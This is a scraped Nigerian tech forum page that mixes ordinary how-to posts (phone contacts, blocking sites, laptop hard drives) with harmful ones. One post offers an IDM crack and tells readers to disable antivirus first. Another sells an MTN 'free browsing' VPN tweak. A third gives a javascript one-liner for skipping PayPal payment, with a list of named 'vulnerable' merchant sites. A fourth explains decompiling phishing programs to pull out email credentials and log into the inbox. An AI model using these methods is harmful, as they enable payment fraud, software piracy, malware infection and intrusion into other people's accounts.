Welcome to AFRIGROUP

Nigeria forum for all updates!!

Welcome to AFRIGROUP

Nigeria forum for all updates!!

Welcome to AFRIGROUP

Nigeria forum for all updates!!

Welcome to AFRIGROUP

Nigeria forum for all updates!!

Welcome to AFRIGROUP

Nigeria forum for all updates!!

http://secure.veeble.org/accounts/aff.php?aff=424

Popular Posts

Subscribe Now!

IDM ALL VERSION CRACK ( NO MORE REGISTERED WITH FAKE ID)

HI friends,
have you ever wanted to download a very important file but could't continue because your Internet Download Manager(IDM) has expired or was registered with fake ID? today i bring a solution to that problem because i will be sharing with you guys my version of IDM crack which has no exception. with my internet download manager crack, you have access to all versions of internet download manager, both the existing versions and the latest version yet to be released.


NOTE: By giving you software cracks does not mean these software are not worth paying for, i share this crack because many of us may not be in position to pay for such software at the time they needs it most.

      DOWNLOAD IDM CRACK FOR ALL VERSION HERE!
This version of internet download manager is pure and free from virus. Remember that before you do software crack, always disable your anti-virus in other to get a perfect result.

Kindly write your experience with my version of internet download manager crack and also return any question or testimony through the comment.

Enjoy!!!

MY VPN ROCKS ON MTN(0.0K)

I AM INTRODUCING TO YOU GUYS THE FAST VPN CALL HEROESVPN FOR PC THE BELOW STEP WILL HELP YOU TO SETUP YOUR HEROESVPN AND YOU WILL START BROWSING FREE WITHOUT HAVE MONEY ON YOUR MTN NIGERIA SIMCARD.
Why our vpn is the best is that our vpn is the fastest and most reliable because we dont have much people on our servers.....
                                                  PROMO: THIS ENDS ON 30TH NOV 2013
For those want to try our  vpn text or email a username and password to the below contact
you will have 7 day active account on our servers within 24 hours.
we reply if your account when username and password is ready via email.
NB: If you send us text send us your email together with your username and password.

TO USE ON YOUR ANDROID VERSION 2.x.x AND 4.x.x download it HERE

AFTER DOWNLOADING THEN GOTO  DOWNLOAD
HIGHLIGHT AND CLICK EXTRACT ALL
GOTO EXRACT FOLDER THE ROOT EXPLORER{IF YOU USING ROOT EXPLORER} WILL TELL YOU
INSTALL THE OPENVPN FOR ANDROID
GOTO THE INSTALLED OPENVPN FOR ANDROID
IMPORT HEROESVPN CONFIG FROM THE EXTRACTED FOLDER.
AFTER IMPORTING CONNECT AND ENTER YOUR USERNAME AND PASSWORD

NB: CONNECT THE TCP for those use it for MTN

NB: IF YOU HAVE PROBLEM WITH EXTRACTING THE VPN DOWNLOAD ROOT EXPLORER HERE AND USE IT TO EXTRACT. {MAKE SURE YOU ENABLE YOU PHONE TO INSTALL UNKNOWN FILE IN YOUR SETTINGS}

CONFIG YOUR PHONE SETTING WITH
APN: web.gprs.mtnnigeria.net
USERNAME: web
PASSWORD: web
If this APN did not work on ur sim try
APN: internet.ng.airtel.com
Username: internet
Password: internet
CHEER!!!

TO USE ON YOUR WINDOWS PC download it HERE
HOW TO INSTALL HEROESVPN ON WINDOWS PC
After downloading the "heroesvpn for mtn 0mb tweak"
1. install the openvpn

2. you will see HEROESVPN-CONFIG folder,
   drag the folder and drop it in this directory,
   local dsk C:program files/openvpn/config for 32bit operating system
                           or
   local dsk C:program files (x86)/openvpn/config for 64bit operating system
   NB: if you want find the "local dsk C" you will goto my computer
   close all the open files

3. How to run the openvpn on your desktop
3.1  For window xp users just double click on openvpn and
     then you will see it on your notifation area at the down right side of your pc
3.2  For window 7/8/visa users just right click on the openvpn you will see run as administrator
     click on it and then you will see it on your notifation area at the down right side of your pc

4. How to connect the openvpn to internet goto the your notifation area click on the openvpn there
   then enter your username and password and connect.
   connect with TCP IF YOU WANT TO CONNECT WITH MTN....

 How get your username and password
  •    payment via nigeria bank
              pay #1000  to my account
              My acount Name:UGORJI EMMANUEL
              ACONUT NO: 2055452160
               BANK: UBA    then send me your batch/teller number space pay for vpn account space username space password
   to 08038227976
   NB: use you username to make the payment to my bank account.
   to renew use the same process
  • payment via perfect money
          pay $4 in PM account - U5256707(USD)    NB: In your PM memo write vpn account space username space password

. support and sales

   call me on +2348038227976
   email me : ugorjiemmanuel20@gmail.com

HOW TO MAKE WORK WITH YOUR MTN
   Make sure you dont have money in your sim card
   config your phone or moderm or any device you use for browsing with your pc,
   with the following configuration.
   APN =gloflat
   USERNAME =flat
   PASSWORD =flat
If this APN did not work try
APN: internet.ng.airtel.com
username: internet
Password: internet

NOTE:
 if you service provide is not list here contact them or call 08031344358 for more help
After configuring your devices and run the openvpn and heroesvpn config then start browsing unlimited
   by just connecting your device and the openvpn.
 

     ENJOY!!!

transfer Contacts from one Cell Phone to another

Did you just buy a new mobile phone? The first thing that you’ll probably is copy all the phone numbers and other contact information from the old phone to your new cell.
Mobile Phone Brands

How to Transfer Contacts another Mobile Phone

The process may vary depending upon the phone support cloud but broadly, there are three options. I will discuss the most popular mobile platforms like BlackBerry, iPhone, HTC, Nokia, Windows Phone, Samsung and Android.

1. SIM based transfer

If the address book of your old phone is relatively small and you only want to copy the phone numbers to your new cell phone, simply use the SIM card.
Just copy the phone numbers from the old phone’s memory to your SIM card, insert this SIM card into your new phone and then copy the phone numbers in your new phone’s memory. Here’s a detailed guide on how to transfer contacts from the Nokia to an iPhone using the SIM.

2. Transfer Contacts via your Computer

The SIM card based approach is good only for transferring basic phone numbers but if your phone’s address book includes long names, email addresses, and other details of your contacts, you need some sort of software to help you with the transfer process.
For instance, if you have a Nokia phone but are shifting to a BlackBerry or an iPhone, you may use Nokia’s Ovi Suite application to copy your phone’s address book to Microsoft Outlook on your desktop computer. You can then use BlackBerry’s Desktop Manager software, or iTunes in the case of iPhone, or Kies for Samsung Galaxy, to transfer contacts from the PC (Outlook) to your new phone’s address book.


Windows Mobile users, like Samsung Omnia or HTC HD2, may again use Microsoft’s Device Center (or ActiveSync for XP) to copy their phone address book to the desktop via Outlook. If you are simply switching from one Windows Phone to another, you can transfer contacts via the cloud itself using Microsoft’s My Phone service.
If you have an old CDMA based mobile phone from, say Samsung or LG, you can use the free BitPim utility to copy the phone book to your computer. BitPim is available for Windows, Mac and Linux machines and it can export address books in standard vCard format (.vcf) that you can easily import into Outlook and other contact managers.

3. Transfer Phone book “Over the Air”

If you have an Internet enabled phone, you can easily copy contacts from your old phone to the new phone over-the-air without even requiring a computer.
An online service called Mobical is free and it works with most mobile phones from Nokia, Motorola, Sony Ericsson and so on. You first need to setup Mobical on the old phone and it will create a backup of your phone contacts in the cloud. Now setup Mobical on the new phone using the same credentials and it will automatically download all the contacts from the cloud to your new phone.
Then there’s Google Sync, a cloud based service that works with BlackBerry, iPhone, Nokia   and most other mobile phones that are SyncML capable. Google Sync keeps your phone’s address book in sync with your Google Contacts. Therefore, if you now install Google Sync on both your old and new phone, they’ll have the same phone book entries automatically.
Android based phones can sync with Google Contacts out of the box – you can then export Google Contacts out as a CSV file and copy it to any other phone manually via the desktop tools.  HTC even offers a desktop utility called HTC Sync that you may use to synchronize Outlook contacts with your Android phone. This will be handy when you want to copy your HTC’s phone book to another phone that is not web-enabled.


How to Access Blocked Websites, Unblock Restricted Sites

How to access blocked websites like Facebook, MySpace, Bebo at school or office?

This article suggests workarounds to help you unblock access to restricted websites at universities, school and offices.

Background: Blocking access to undesirable Web sites has been a common government tactic but China, Iran, Saudi Arabia are believed to extend greater censorship over the net than any other country in the world.

Most of the blocked or blacklisted sites in Saudi Arabia are about sex, religion, women, health, politics and pop culture. They even block access to websites that sell swimming or bathing suits. In China, websites that talk about sex, Tibet or Democracy are blocked.

Social sites that are often blocked include Google News, Typepad, ebay, blogger, youtube, facebook, MySpace, Pandora, Bebo, Photobucket, Yahoo! Messenger, AOL AIM, last.fm, etc.

There are always legitimate reasons to bypass the internet filters and unblock websites. The following tricks will show how to access all websites at school, college, offices or at home.

1: To access blocked website, type the IP number instead of the URL in the browser address bar. However, if your blocking software maps the IP address to the web server (reverse DNS lookup), the website will still remain blocked.

2: Use a URL redirection service like tinyurl.com or snipurl.com. These domain forwarding services sometimes work as the address in the the url box remain the redirect url and do not change to the banned site.



3: Use Google Mobile Search - Google display the normal HTML pages as if you are viewing them on a mobile phone. During the translation, Google removes the javascript content and CSS scripts and breaks a longer page into several smaller pages.



4: Enter the URL in Google or Yahoo search and then visit the cached copy of the page. To retrieve the page more quickly from Google's cache, click "Cached Text Only" while the browser is loading the page from cache.

5: There are anonymizer websites who will fetch the blocked web page from their servers and display them to you. As far as the service provider is concerned, you are viewing the page on the Anonymizer website and not the blocked site.

6: You can access blocked or restricted websites by using Yahoo Babelfish or Google Translate language tools as a proxy server.

You just have to invoke the Google translate service with the same language pair like English to English. Assuming that Google is accessible in your school, you should be able to access any website with this method -barbelfish proxy



7: Anonymous Surfing - Browse the internet via free proxy server. A proxy server (or proxies) is a normal computer that hides the identity of computers on its network from the Internet.

Which means that only the address of the proxy server is visible to the world and not of those computers that are using it to browse the Internet. Just visit any proxy server with your Web browser and enter a URL or the address of the blocked website.

How Parents Can Block Certain Websites from Children

[For non-techie parents who have a computer at home and are worried about their kids safety online.]
A mother recently wrote saying she is very concerned that her young children are spending too much time on websites like Orkut, MySpace and Facebook.
Her worries are not just about children wasting time on the Internet – it’s more about the activities that children are doing on these sites. She is concerned that children could be interacting with complete strangers (or online predators) and even sharing personal information.
And with some news reports saying that criminal activities could have been planned on Orkut, the mother has finally made up her mind to restrict access to Orkut and some other websites on the home computer.
The only problem is that she has absolutely no clue about how to block websites – parental control software like Net Nanny or Norton Internet Security are pretty good but they cost money.
Now before you take this extreme step of blocking website (that is very likely to be opposed by children), try a few things:
  1. Educate your children about the dangers of sharing information online with strangers. Family members should talk in detail about privacy and the web.
  2. Place the computer in the living area of your home from where you can easily see the screen so you’ll have some idea about activities that children are doing on the computer including the websites they are visiting frequently.
  3. Orkut is an open social network – that means you can easily see who’s in the friends’ list of your children and what kind of text notes (or scraps) are they exchanging with each.
Finally, to block websites on your home computer without investing in expensive software, here’s the trick (for Windows PCs):


Step 1: Click the Start button and select Run. Now type the following text in that Run box:



Step 2: You will see a new notepad window on your screen containing some cryptic information. Don’t panic. Just goto the last line of the file, hit the enter key and type the following:
127.0.0.1 orkut.com
127.0.0.1 facebook.com
127.0.0.1 myspace.com
Save the file and exit. That’s it. None of the above sites will now open on your computer.
You can block as many websites as you like with the above technique. If you want to remove the ban later, open the same file as mentioned in Step 1 and delete the above lines.
Pretty simple but remember, our children are also very smart. And there are some popular ways to unblock websites.

How to Download Videos from YouTube

There are basically two categories of tools that let you download Flash videos from YouTube, Vimeo and other video sharing sites.
The first category consists of web apps, Zamzar for example, that save a copy of the video on to their own servers and then send you a direct link to download that video file. Then there are desktop-based tools that download videos clips from the video hosting site directly to your computer and also convert the file into proper format.
FreeMake for Windows fits the latter category. It is an extremely easy-to-use software that can grab Flash videos from all the popular video sharing sites with one simple click. Just paste the video URL into the FreeMake window and the tool will do the rest.
download_videos
FreeMake Video Downloader offers two modes – the one-click download mode will save the video offline using the default settings without pestering you while the standard mode will offer you a choice of video formats before starting the download (see screenshot).
There’s a built-in video converter so you can easily extract the audio from the video files or convert them to smaller formats suitable for playing on your mobile or tablet.
The new version can resume broken downloads which could be handy if you are downloading a large video file on a flaky connection. And it now supports nearly all streaming video sites including Facebook, Vimeo, Dailymotion, Flickr and YouTube.

GET YOUR USA PHONE NUMBER FOR FREE (STEPS)


Getting your own USA Phone Number – Step by Step

Step 1: Sign-up for a free account with CallCentric.com and click continue. CallCentric will send you a confirmation mail to verify your email address.

Step 2: Once you’ve verified the email address, provide your city and country code, agree to the terms and conditions and click “Sign me up.”

Step 3: CallCentric will now provide you with a virtual tour of their websites. Skip it and choose – “Go to My CallCentric.” The next screen will list your CallCentric # in the format 1777** – copy that number to the clipboard.


Step 4: Open a new browser tab and go to phone.ipkall.com. Set the account type as SIP and paste the CallCentric # from the clipboard into the field that says SIP Username. The hostname is in.callcentric.com and choose the same email address and password that you used while setting up your CallCentric account.
[*] The default area code for your local US phone number is 253 but you may choose a different one from the drop-down. For this example, I’ll go with 425.

Step 5: Within a minute, you should get an email from ipkall.com with your new local phone number. Keep the email handy as you’ll need it while configuring the SIP client.

Step 6: Now that we have got ourselves a US phone number, let’s activate it.

6a. Download and install Express Talk on your computer. The trial version is good enough for our task. Make sure that you don’t install any of the “optional components” like toolbars, etc. during the setup.

6b. During installation, choose the default options for all the wizard screens. When you are on “SIP Setup,” choose “Yes, I already have a SIP account” and click Next. Fill the SIP details as in Step 4 above. Finish the setup.

6c. Once the setup is complete, go back to your My CallCentric page and refresh it. You should see a notification saying – “your phone is registered.” Done!
Screenshots Tour – Getting a US Number

Setup your CallCentric account

Click the verification link to activate your account

Keep a note of your SIP Number

Login to your SIP account

Activate your SIP number

Input your CallCentric details here

Enter your SIP Details

Your phone is now registered

Update: You can grab a SIP VoIP client for your mobile phone and configure it with your new CallCentric /ipKall number. Most Nokia Symbian phones can be configured for SIP without external apps or just search for “SIP phone” in iTunes or the Android marketplace. Popular mobile app Fring is free and also supports SIP.

HOW TO TRICK THE PAYPAL PAYMENT BUTTON

First search any vulnerable website and then paste the below script in the address bar and hit enter

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

 


After hitting enter,enjoy the free product

Here is the most updated list of website which are vulnerable to this javascript;


http://www.businesslistsforsale.com/Specialty-Lists.shtml
http://freewaretools.net/search/“this-order-button-requires-a-javascript-enabled-browser-submitter/
http://freewaretools.net/search/this-order-button-requires-a-javascript-enabled-browser-instant-download/
http://freewaretools.net/search/this-order-button-requires-a-javascript-enabled-browser-seo/
http://www.orderproductsdirect.com/Instantdownload.htm
http://www.wewritequalityarticles.com/
http://www.buildmeacashblog.com/
http://www.lynkstatrak.com/samples-1.htm
http://ready-made-income-sites-at.yourglobalcompany.com/
http://www.golfersdream.com/advertising_ezine.htm
http://www.claypals.net

BEST HACKING TOOLS EVER

Top Ten Hacking Tools Ever

A Hacking tool is nothing but a device or a piece of software used by any unauthorized user to gain access or to attack any information available on your computer. Hacking tools try to bypass the security systems of any computer in order to gain copy or even to destroy information from its host. Here is a list of what is believed to be among the best of the hacking tools by most hackers. These tools are used only for ethical hacking purposes and are not illegal.

1. Nmap

The tool Network Mapper has gained immense popularity in recent times as it is an open source and a free tool which is used to explore networks and also in security auditing. It is designed to scan networks rapidly. It also copes very well against a single host. Nmap uses IP packets to determine what type of hosts are present in the network along with information on the applications being used by them and also the operating systems that they are running along with their respective versions. In additional to these it also identifies the firewalls being used and many more other characteristics of any given host.

2. Nessus Remote Security Scanner

The Nessus Security Scanner was started by Renaud Deraison in the year 1988 to provide a free remote scanner to the internet community. But since the year 2005 the Nessus Remote Security Scanner has become closed source software although the engine that runs the software is still free of cost.

The Nessus Security Scanner has been the world's most popular scanner being used by well over 75000 organizations world-wide. Many have befitted from this software and it is being used extensively in auditing critical enterprise devices.

3. John the Ripper

John the Ripper commonly known as JTR is a password cracker available for DOS, WIN32, UNIX, OpenVMS and BeOS. Its primary purpose is to detect weak passwords, but at the same time can be very handy to crack passwords also.

4. Nikto

Nikto web scanner as the name suggests is an Open Source web scanner which is capable of performing comprehensive tests on any web server for multiple items, including some of the most potentially dangerous files or CGIs, versions in about 625 servers and version specific problems in about 230 servers.

5. SuperScan

SuperScan is a powerful TCP port scanner, resolver and also pinger. It is a very highly popular port scanning tools made especially for windows users. If you are looking for a substitute to Nmap with a good user interface, then SuperScan is your best bet.

6. p0f

p0f is an extremely versatile passive OS fingerprinting tool. It can identify the operating systems on SYN mode, SYN+ACK mode and also RST+ mode. The p0f software is so versatile that it can fingerprint anything without even making a single active connection to the target system.

7. Wireshark

Wireshark which was formerly known as ethereal is network protocol analyzer or in common terms a sniffer. Wireshark lets you browse and capture the contents of network frames. It is compatible with both windows and linux and is very user-friendly.

8. Yersinia

Yersinia is a hacking tool which is designed to manipulate the weaknesses in different Layer 2 protocols. It pretends like a solid framework for testing and analyzing the systems and networks it is deployed into. Spanning Tree Protocol (STP), Dynamic Trunking Protocol (DTP), Cisco Discovery Protocol (CDP), Hot Standby Router Protocol (HSRP), Dynamic Host Configuration Protocol (DHCP), VLAN Trunking Protocol (VTP), IEEE 802.1q and Inter-Switch Link Protocol (ISL), are some of the protocols which can be implemented.

9. Eraser

Eraser is an advanced security tool for windows used to completely remove any trace whatsoever of any bit of information permanently from the hard drive. This is achieved by continuously overwriting the memory locations where the targeted information was previously available. It works well on all the windows versions till windows xp. Eraser is a free tool which is available under the GNU General Public license.

10. PuTTY

PuTTY is a free software used for implementation of Telnet and SSH for UNIX and WIN32. It is an absolute necessity for any h4x0r to Telnet or SSH without using MS command line clients.

These are the most popular of the hacking tools that are being used widely there are also several other alternatives to these tools so feel free to experiment with other varieties of tools out there. Along with the above a few other software, which are almost similar to the ones mentioned above like LCP, Cain and Abel, Kismet and NetStumbler are also good and handy.

A collection of all the above would give any user enough power to be a good hacker. It is also important to note that the information furnished here is not meant to be used for illegal purposes and also that hacking is a punishable offence in most countries. Use these powerful tools wisely.
- See more at: http://www.techshub.co/2012/12/best-hacking-tool-list-top-10-hacking.html#sthash.IcOe8iYQ.dpuf

REVERSE ANY PHISHER PROGRAM

Step 1 -Head to http://reflector.red-gate.com/Download.aspx and download .NET reflector

Step 2 - Run .NET reflector


Step 3 - Download the phisher you want to reverse

Step 4 - Go into your Downloads folder and grab your phisher into .NET Reflector


Step 5 - expand your phisher

Step 6 - Open the one that is the name of the file, not the ".MY", ".MY.RESOURCES", or "-" or "references"

Step 7 - Theirs usually a form1, expand it

Step 8 - Look for button1_click, or something very similar, it's usually near the top, right click it and click 
"Disassemble"


Step 9 - Now look for Network credentials, and you have the email info


Step 10 - Go to the email, check the inbox

How To Connect Your Laptop To Your Television

I’m writing this post on how to connect your PC or computer to a TV because last week I returned from a trip in India and wanted to show all of my pictures and videos to my family from my laptop onto our HDTV, but unfortunately I did not have the correct cords and so after fumbling around for 30 minutes trying to connect my computer to the TV, I had to tell everyone that they would have to wait till the next weekend! Pretty annoying considering the times we live in, it should be quite easy to connect the two together!
So here’s a quick walk-through of all the methods that I know (if you know any more, please comment) to connect a laptop or PC to your TV:
1. S-Video – This is probably the most common method out there currently because an S-Video cable is cheap as heck and just about every TV under the sun has a S-Video port. You’ll have to make sure you laptop is equipped with this port. Remember, there are two types of S-Video cables: 4-pin and 7-pin. Most laptops and PC’s are equipped with a 7-pin port, so if your TV only has a 4-pin S-Video port, then this method will not work.
2. VGA – If you have a HDTV, then you will be better off connecting using a VGA cable. It gives much better quality than S-Video and as with S-Video, the cable is very cheap. You usually won’t find a VGA port on regular TV’s though, so this option is if you have an HDTV.
3. DVI - DVI stands for Digital Visual Interface with “digital” being the key word there. The digital signal will give a higher quality picture than either S-Video or VGA. Of course, your computer will need to have a DVI connection and your TV will need to be an HDTV. This cord is definitely not cheap, it ranges anywhere from $40 to $80.
4. HDMI – Using HDMI will give you the best quality by far. No computers that I know of yet have HDMI ports, but you can get a DVI to HDMI cable to connect it to your HDTV. HDMI is compatible with DVI.
5. Scan Converter Box – This is the last method that I could think of and it involves using a scan converter box, which takes a VGA signal and converts it into S-Video or component video.

How Hackers Use Your IP Address to Hack Your Computer & How to Stop It

Your IP (Internet Protocol) address is your unique ID on the internet. It's synonymous with your home address. Anyone in the world can contact your computer through its IP address, and send a retrieve information with it.
I'm sure at one time or another you've heard that hackers can hack your computer via your IP address. This is one of the reasons proxies and anonymity services exist, to protect people from learning your IP address. So how are hackers using just an address to get into your computer and make your life hell?
Open ports. Your computer runs services like media sharing on what are called ports. A port is just an opening that a service uses as a communications endpoint. There are 65,535 total allocated ports inTCP/UDP. To exploit a service on a port, a hacker would banner grab for the software and version. After they learn that information, they would search sites like Packet Storm for known exploits to run against the service.
Today's Null Byte is going to demonstrate a simple "port scan" on local computer using Nmap, and teach how a hacker would exploit these services, as well as how to guard ourselves against it. This will be done under Linux, but Nmap is available for all platforms. If you can't figure out how to install it in Windows with the GUI installer (yeah, right), follow along using Cygwin.

Step 1 Download & Install Nmap

Bold words are commands that must be entered in a terminal emulator.
First, we must download Nmap, which is going to be our tool that we use for port scanning and information gathering:
    wget http://nmap.org/dist/nmap-5.51.tar.bz2
Now, extract the archive:
    tar -zxvf nmap-5.51.tar.bz2
Change to the newly made directory:
    cd <directory name>
This is the standard installation procedure:
   ./configure
   make && sudo make install
Nmap should now be installed!

Step 2 Scan for a Target

Let's scan a local computer. I'm going to use a website as an example, rather than a local computer. This is because my firewall is absolutely crazy, and filters out scans. Don't scan a remote computer with the intentions of doing bad deeds. This is for educational purposes only.
Start by mapping out your local network:
    sudo nmap -sP 192.168.1.0/24
That should return a list of hosts that are up for a port scan!
How Hackers Use Your IP Address to Hack Your Computer & How to Stop It

Step 3 Scan Your Individual Target

Out of the returned list of targets, pick one that you would like to scan for services. Let's do a full scan of all the TCP/UDP ports:
    sudo nmap -p 1-65535 -T4 -A -v <target IP goes here>
You should get something that looks like the following image:
How Hackers Use Your IP Address to Hack Your Computer & How to Stop It
As you can see, this target has MANY open ports. SSH piques my interest, so let's move on to banner grabbing to learn the software version or our choice of service.

Step 4 Banner Grabbing

For this, you can use the regular ol' telnet client. Telnet comes with Windows and most Linux distros:
    telnet <host IP> <port banner to grab>
From this, I would learn which software version the service is running, then see if I can find a way to exploit it.

How Can I Protect Myself?

Luck for all of you lovely people, I recently made a tutorial on iptables, which will filter out unwanted connections. Also, disable any unnecessary programs that connect to the internet (remote administration, media sharing, etc).
Windows users, install Comodo firewall, it's incredible and uses a simple point and click installation, and will filter ports for you. It has great default settings and it is free.

How to Replace Your Laptop Hard Drive Easy



If your laptop's hard drive has gone down for the count, or if you want to swap it out in favor of something larger or faster (a solid-state drive can perk up a laptop's performance considerably), I have good news for you: Replacing a hard drive is usually a simple and straightforward procedure; and if things get tricky, our walkthrough will help you do the job safely and efficiently.

On some laptops, switching drives is as easy as undoing a latch, sliding the drive caddy out, removing a couple of screws, swapping drives, and then repeating the previous steps in reverse. But on other machines, the hard drive is buried under the keyboard or motherboard, without an access panel. Dealing with this type of design entails removing dozens of screws, the keyboard deck, the keyboard, the motherboard, and many parts and connectors. Fortunately, the latter scenario has become significantly rarer in recent years.

The best place to start when you want to upgrade or replace your hard drive is with the user's guide for your laptop. If the disk-swapping procedure is simple, the guide will tell you how to do it. In that case, you won't need any further help, though some of the tips offered here may make the operation easier and safer for you and the equipment.

If your user's guide doesn't cover the procedure, it may be a more complicated task. Fortunately, you can find a teardown guide and/or video on the Web for virtually every modern electronic device. A quick search for your laptop model should yield something you can use. If not, searching for a similar model may turn up helpful reference material.

If you want to replace your drive, you need to know whether your laptop requires an older 44-pin ATA-style drive or a newer edge-connector SATA drive; the former are found only in older laptops. You can still find ATA drives?as well as some ATA SSDs?but you might be better off using a small SATA-to-ATA bridge adapter. At this writing, no 2.5-inch, greater-than-2.2GB drives are available for laptops, but if you're reading this down the road, you may also encounter a small issue requiring a BIOS upgrade.

Gather Your Tools
Spudgers are excellent tools for gently prying apart pressure-fit laptop components.

To replace your hard drive, you'll need (at a minimum) a high-quality small-head Phillips screwdriver; you may also need hex-head Torx drivers and with recent Macs, a pentagonal driver. Ideally, you would use a good multitool with a comfortable grip and swappable flat, Phillips, and Torx tips of appropriate size for laptops, cell phones, and the like. Thin-handled jeweler's screwdrivers are undesirable because they may not allow you to apply enough force. If you don't have the right tools for the job, you can probably find them on Amazon and eBay, or at your local hardware store or Radio Shack.

For some laptops, you may also need a spudger?a plastic or metal tool that you can use to gently pry apart pressure-fit plastic parts. Older Mac laptops are infamous for requiring spudgers, but many other laptops also call for some gentle prying before they'll grant access to their guts. If your spudging skills aren't well developed, stick with plastic versions; they wear out more quickly, but they're less likely to scratch metal surfaces or cause electrostatic damage. Spudgers are inexpensive, too, so you can grab an array of thicknesses and shapes at little cost.

Thin-nose tweezers can be handy on occasion, too. If possible, use a pair with angled tips, so you can see what you're gripping, without your hands getting in the way. Angled thin-nose tweezers are great for gently prying open latches and for pulling screws out of wells. Another practical item is a multibay container where you can park screws and other small removable parts, especially if your project involves removing many different parts. No one wants to be stuck staring at a bunch of similar, yet different screws and trying to sort them out post facto.

If you're not familiar with the numerous small connectors that laptops may include, a magnifying glass can help you spot tiny catches that might break if you attempted to pull a plug out of a connector with the latch still attached, or might result in your accidentally pulling a receptacle free from a circuit board. If possible, use a magnifying glass to watch for the following factors that could damage your laptop.

Know the Risks
Hidden fasteners: When you're disassembling a laptop or other device, don't try to force things apart. In all likelihood, if you have to exert more than modest force to remove or separate parts, a hidden screw or fastener is holding up progress. You may need to remove another part or turn the unit over to find what's holding things together. Many laptop manufacturers hide important screws under rubber feet, labels, and panels for aesthetic reasons; but you can seriously damage your laptop by attempting to wrench it apart while some screws are still in place.

Some tiny connectors have latches that are difficult to spot. If a cable doesn't coming out as easily as you think it should, take the time to look for a latch.

Keep an eye out for small cables and connectors when taking apart your laptop to replace your hard drive.

Cables: Hidden cables are another common laptop hazard. All parts of a laptop other than shields and miscellaneous plastic are connected electrically, and if a socket isn't handling the job, a cable is. Ribbon cables and wire cables run from the keyboard deck (the upper half housing the keyboard and touchpad, among other things) to the motherboard, from daughter boards to the motherboard, from the motherboard to the base, from the modem to the motherboard, and so on. Other cables connect the touchpad, the finger swiper, the status lights, the speakers and any other components embedded in the keyboard deck.

Removing ribbon cables generally entails flipping up a tab at the back of the slot where the cable terminates. Wire cable connectors usually terminate in pressure-fit connectors that must be pried out. Sometimes you may have to depress a small catch. A spudger handles this task very well.

When disassembling a laptop, it pays to be organized and to take notes. For example, when I need to perform a complex breakdown that I've never done before, I either video the disassembly procedure or take photos that show where the screws and parts belong at each major step. This approach may seem laborious, but it can be a tremendous help when you reassemble your laptop. That said, don't go crazy: If all you have to worry about are four identical screws, don't bother.

Hard Drive Removal Tips and Tricks
Most hard drives are mounted on rails or metal frames with screws, rubber grommets, or other shock-reducing technology. You'll need to reuse these rails or frames when mounting your new drive, so take care not to lose them during the swap. Usually, the screws from the old drive will fit the new one, but different hard drive vendors may use screws with a different thread pitch. Your replacement drive will have shipped with its own screws; if these aren't long enough or are unsuitable for some other reason, you may need to visit your local computer store.

On older ATA hard drives, an adapter may cover the connection pins. You must remove this adapter for reuse with the new drive, but perform the operation cautiously; if you don't grab the adapter in the middle and pull it straight back, you may bend the connector pins. When this happens, you can try to force them back into position, but straightening them isn't easy, and they sometimes break off entirely.

If you can't get a firm enough grip to pull the adapter off, try to pry it up gently with your tools?but do so in tiny increments, first on one side and then the other, alternating until the adapter falls off.

Side-mounted hard drives: The easiest hard drives to replace are those in laptops that use side-mounted, removable drive caddies or trays. Usually, a latch or screw holds the drive in place, and typically that fastener is accessible from the bottom of the laptop. Undo the latch, or remove the screw or screws; slide out the tray; and replace the drive.

Under an access panel: Many laptop designers situate their hard drives under a removable panel located on the bottom of the machine. Remove the panel; detach any retaining clips, screws, or frames; and slide the drive out. Usually, you'll have to pull backward to free the drive from its connector, and then lift the drive up and out.

Hard drive revealed by removing a panel on the underside of the laptop.

Under the keyboard or motherboard: On laptops where the hard drive is located in one of these places, your job is a lot tougher. Carefully store the removed parts in a logical, organized manner, however, and you'll find the task time-consuming but not impossible.

Though the particulars vary, the disassembly procedure should go something like this:

Flip the laptop over and remove the screws that hold the keyboard deck in place. Remove the keyboard deck. This may require sliding a spudger along the seam between the lower portion of the case and keyboard deck to release snaps that may be holding the two together. Some modern units are sealed, so don't assume that there's an easy way in. If you discover that your laptop vendor used hot glue to hold things together, you might want to farm out the chore?it's easy to mess things up with heat.
Remove the keyboard and other components that hide the hard drive or prevent you from dislodging the motherboard. This step may involve taking out screws; peeling back tape; detaching components such as modems and Wi-Fi modules; and detaching clamped ribbon cables, regular cables, or antennas with pressure-fit connectors. You may also have to remove metal RF shields. Be gentle and reread the section on hazards, above.
If the hard drive is situated under the motherboard, you can probably remove the latter after taking out a few more screws. However, the ports integrated onto the motherboard protrude out the case, so you may have to jockey the motherboard as you pull it out. Again, be alert for hidden cables.
Stop the disassembly process as soon as you have access to the hard drive. I've seen drives that were taped in place, screwed down, or held in position by fancy hardware. I've also encountered drives that lay loose after I removed a shield or panel. None of these various circumstances pose a special challenge; but carefully observe what's there, and above all don't force things.

Once you've successfully removed your old hard drive, simply reverse the procedure to insert the new drive and reassemble the laptop. Thats all i Have!


If your laptop's hard drive has gone down for the count, or if you want to swap it out in favor of something larger or faster (a solid-state drive can perk up a laptop's performance considerably), I have good news for you: Replacing a hard drive is usually a simple and straightforward procedure; and if things get tricky, our walkthrough will help you do the job safely and efficiently.

On some laptops, switching drives is as easy as undoing a latch, sliding the drive caddy out, removing a couple of screws, swapping drives, and then repeating the previous steps in reverse. But on other machines, the hard drive is buried under the keyboard or motherboard, without an access panel. Dealing with this type of design entails removing dozens of screws, the keyboard deck, the keyboard, the motherboard, and many parts and connectors. Fortunately, the latter scenario has become significantly rarer in recent years.

The best place to start when you want to upgrade or replace your hard drive is with the user's guide for your laptop. If the disk-swapping procedure is simple, the guide will tell you how to do it. In that case, you won't need any further help, though some of the tips offered here may make the operation easier and safer for you and the equipment.

If your user's guide doesn't cover the procedure, it may be a more complicated task. Fortunately, you can find a teardown guide and/or video on the Web for virtually every modern electronic device. A quick search for your laptop model should yield something you can use. If not, searching for a similar model may turn up helpful reference material.

If you want to replace your drive, you need to know whether your laptop requires an older 44-pin ATA-style drive or a newer edge-connector SATA drive; the former are found only in older laptops. You can still find ATA drives?as well as some ATA SSDs?but you might be better off using a small SATA-to-ATA bridge adapter. At this writing, no 2.5-inch, greater-than-2.2GB drives are available for laptops, but if you're reading this down the road, you may also encounter a small issue requiring a BIOS upgrade.

Gather Your Tools
Spudgers are excellent tools for gently prying apart pressure-fit laptop components.

